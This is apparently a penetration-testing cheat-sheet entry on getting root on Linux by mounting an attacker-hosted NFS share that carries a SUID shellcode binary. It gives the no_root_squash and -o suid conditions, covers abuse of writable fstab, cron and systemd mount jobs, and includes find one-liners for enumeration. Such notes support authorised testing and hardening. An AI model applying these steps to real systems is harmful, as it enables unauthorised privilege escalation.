NFS (attacker-machine)

NOTE: Do not confuse this method with NFS (client-side). The NFS server in this case is ran from the attacker machine instead

Attacker machine

• Create a mountable share point hosting a shellcode with root as owner, and SUID bit set

• Make the shellcode file executable by all

Target machine

• Mount the attacker share

• Execute the binary to gain a root shell

Required conditions

1. NFS share configurations does not suppress SUID

Attacker machine

• /etc/exports should have the no_root_squash option for the export:

/... *(...,no_root_squash)

Target machine

• The mount option should have the -o suid flag set:

$ mount -t nfs ... -o suid

1. Misconfigured mount settings

Note that the mount command requires superuser privileges

• Writable /etc/fstab — this file controls the mounting of file systems on boot

• Writable and privileged cron-jobs, or systemd services with mount functions that allows an attacker to modify the contents, and point the mount towards the attacker server instead

• Method to run mount without sudo

Enumeration (possible scripts)

# /etc/fstab
$ ls -l /etc/fstab

# systemd services
# find writable files under systemd directories and search inside for the word "mount"
$ find /etc/systemd/system -writable -type f -exec grep -iH "mount" {} \; 2>/dev/null 


# cronjobs
# find writable files under cron directories and search inside for the word "mount"
$ find /etc/cron* -type f -writable -exec grep -iH "mount" {} \; 2>/dev/null